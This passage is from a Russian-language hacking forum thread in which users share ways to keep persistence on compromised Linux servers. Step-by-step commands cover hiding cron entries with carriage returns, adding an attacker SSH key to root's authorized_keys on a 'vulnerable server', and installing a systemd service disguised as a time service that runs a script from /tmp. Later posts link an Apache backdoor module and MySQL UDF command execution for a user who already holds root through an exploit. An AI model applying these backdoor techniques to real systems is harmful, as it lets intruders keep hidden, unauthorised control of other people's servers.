Старый 19.01.2013, 21:10   #21
slashd
 
Регистрация: 06.07.2010
Сообщений: 47
Репутация: 27
По умолчанию

Цитата:
Сообщение от b3 Посмотреть сообщение
...

ЗЫ Вот еще интересный способ спрятаться в кронтабе: http://vladz.devzero.fr/004_hide-crontab.php
На случай если ресурс умрет, копипаста:

Here is an easy way to hide a task inside a crontab by using the carriage return character ('\r'), example (using cron version 3.0pl1-109):...
В качестве разделителя лучше использовать '||' вместо ';', т.к. crontab пытается выполнить команду '\rno', в результате чего возвращается ошибка исполнения и логи падают на почтовый ящик локалхоста пользователя. Потом это проявляется назойливыми предупреждениями в консоли о непрочитанных сообщениях.
slashd вне форума   Ответить с цитированием
Старый 09.02.2013, 12:09   #22
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

Закрепление в системе через ключи rsaauthentication ssh

Все знают данный метод, но тут он не описан...
Минус метода в том что он паливный когда пользователь на уязвимой системе не использует данный метод авторизации.
Зависимости:
В sshd_config
Код:
RSAAuthentication yes
Приступим:
1) Добавляем тестового пользователя, переключаемся на него:
Код:
# useradd -m xekir
# su - xekir
2) Генерируем ключи у этого пользователя:
Код:
[xekir@home ~]$ ssh-keygen -t rsa
3) Публичный ключь-строку вносим в список авторизованных ключей на уязвимом сервере:
а) сгенерированная ключь-строка лежит в
Код:
[xekir@home .ssh]$ cat /home/xekir/.ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRF+p8DbbE4SZpCknNkx7EYLgkNP6YmsiVfzy3RCUvDqDGrLQ3FI/GVMwsCzMOqB7JRyZiK7f8ZnHRZH78pvXA0SQxt7agac18cjop+B7S1MtjTMm/zWFhdHMMBu0q8EsMLJX4276IrIvqxMX4VsB5m4KE4p5wkMOOw2faVKSBC6DbY8EpbFh0yrWICochXTYGD+FH2hREAwL90Dhw+gsVPYPI0kg2NtlMj6cuI9TDpxiOwbhTMvy2l0jKNSo569zBxYapE4XbqdJsgrrTCGkFIpXiaSE2Bd4hjgO4wR17eEOIeQg4fG6zkXoKrXgGKZyE5o2Fny9LfL0QAic/kNIJ xekir@home
б) список авторизованных ключей на уязвимом сервере (с шела):
Код:
$ cat /etc/ssh/sshd_config | grep AuthorizedKeysFile 2>&1
AuthorizedKeysFile	%h/.ssh/authorized_keys
Вносим (с шела):
Код:
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRF+p8DbbE4SZpCknNkx7EYLgkNP6YmsiVfzy3RCUvDqDGrLQ3FI/GVMwsCzMOqB7JRyZiK7f8ZnHRZH78pvXA0SQxt7agac18cjop+B7S1MtjTMm/zWFhdHMMBu0q8EsMLJX4276IrIvqxMX4VsB5m4KE4p5wkMOOw2faVKSBC6DbY8EpbFh0yrWICochXTYGD+FH2hREAwL90Dhw+gsVPYPI0kg2NtlMj6cuI9TDpxiOwbhTMvy2l0jKNSo569zBxYapE4XbqdJsgrrTCGkFIpXiaSE2Bd4hjgO4wR17eEOIeQg4fG6zkXoKrXgGKZyE5o2Fny9LfL0QAic/kNIJ xekir@home' >> /root/.ssh/authorized_keys
Проверяем:
Код:
[xekir@home .ssh]$ ssh root@192.168.0.100 "id;hostname"
uid=0(root) gid=0(root) группы=0(root)
debian-webserver386

Ссылка по теме:
http://www.opennet.ru/base/sec/ssh_pubkey_auth.txt.html
b3 вне форума   Ответить с цитированием
Старый 13.05.2013, 23:28   #23
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

Закрепление в системе через SYSTEMD
Данный метод хорош тем что systemd относительно недавно начали использовать и около-одмины могут не очень хорошо в нем "шурупить". На данный момент systemd по моему еще нет в debian но есть в centos серверах.

1) Создаем сервис-файл evil.service и наш сценарий /tmp/heck с нужным функционалом:
Код:
[Unit]
Description=Network Time Service (once)
After=network.target nss-lookup.target 

[Service]
Type=oneshot
ExecStart=/bin/sh /tmp/heck

[Install]
WantedBy=multi-user.target
/tmp/heck:
Код:
#!/bin/sh
id > /tmp/id.txt
2) Включаем его:
Код:
systemctl enable evil
3) Проверяем:
Код:
systemctl start evil
cat /tmp/id.txt
Цитата:
[23:18][root@home][/etc/systemd/system]# cat /tmp/id.txt
uid=0(root) gid=0(root) группы=0(root)
Теперь при включении сервера, после того как загрузиться network.target nss-lookup.target запуститься наш юнит который в свою очередь запустит наш сценарий однократно.

Инфа по systemd:
https://wiki.archlinux.org/index.php/systemd
http://www.freedesktop.org/wiki/Software/systemd
b3 вне форума   Ответить с цитированием
Старый 29.06.2014, 17:41   #24
ewi
 
Регистрация: 02.04.2014
Сообщений: 75
Репутация: 2
По умолчанию

Всё это хорошо, но если тема такая...
На серве включен "Safe mode: ON". Доступ к системе через ssi. Рут через эксплоит. Модуль Perl в апаче не загружен.
Вопрос вот в чем, как закрепиться в системе на случай, если админ запалит ssi и шелл останется изолированным в одном только php?
ewi вне форума   Ответить с цитированием
Старый 05.07.2014, 15:52   #25
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

ewi, Command execution with a MySQL UDF
http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html
b3 вне форума   Ответить с цитированием
Старый 26.11.2014, 18:53   #26
smerch
 
Регистрация: 20.01.2011
Сообщений: 21
Репутация: 6
По умолчанию

искал вариант закрепление на одном сервере, нагуглил такой mod apache: https://github.com/jingchunzhang/backdoor_rootkit/tree/master/mod_rootme-0.4

протестировал на debian(localhost) и centos, работает не плохо.
Единственное что, нужно апи апача подправлять в httpd*.h
smerch вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot